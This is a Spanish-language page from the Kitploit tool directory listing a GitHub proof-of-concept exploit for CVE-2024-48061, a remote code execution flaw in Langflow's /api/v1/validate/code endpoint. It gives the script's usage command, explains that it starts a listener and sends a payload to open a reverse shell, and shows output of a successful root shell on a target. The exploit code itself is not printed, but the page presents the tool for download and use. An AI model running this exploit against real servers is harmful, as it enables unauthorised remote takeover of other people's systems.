Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-48061 — CVE-2024-48061 Langflow vulnerable a la ejecución remota de código. Poc | Kitploit
Herramientas/GitHubGitHub/bwithe/cve-2024-48061
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubbwithe/cve-2024-48061

CVE-2024-48061

CVE-2024-48061 Langflow vulnerable a la ejecución remota de código. Poc

Ver Repositorio
8hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-48061 Langflow vulnerable a ejecución remota de código

CVE-2024-48061 poc

Uso

python3 poc.py -i <web_ip> -p <web_port> -l <listener_ip> -lp <listener_port>

Descripción

Este script explota un endpoint API vulnerable en /api/v1/validate/code en el servidor web objetivo. Primero verifica la presencia de la ruta vulnerable, luego inicia un listener TCP en la IP y puerto del listener especificados. Una vez que el listener está listo, envía un payload especialmente diseñado al objetivo para generar una shell inversa que se conecta de vuelta al listener.

Ejemplo

  • Intento exitoso
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[+] Vulnerability detected at http://192.168.0.2:7860/api/v1/validate/code
[+] Listening on 192.168.0.3:4444 ...
[+] Sending payload to http://192.168.0.2:7860/api/v1/validate/code
[+] Connection from 192.168.0.2:60440
# whoami
whoami
root
# exit
[*] Exiting shell.
  • Intento fallido
python3 poc3.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 4444
[-] Doesn't look vulnerable
Descargar herramienta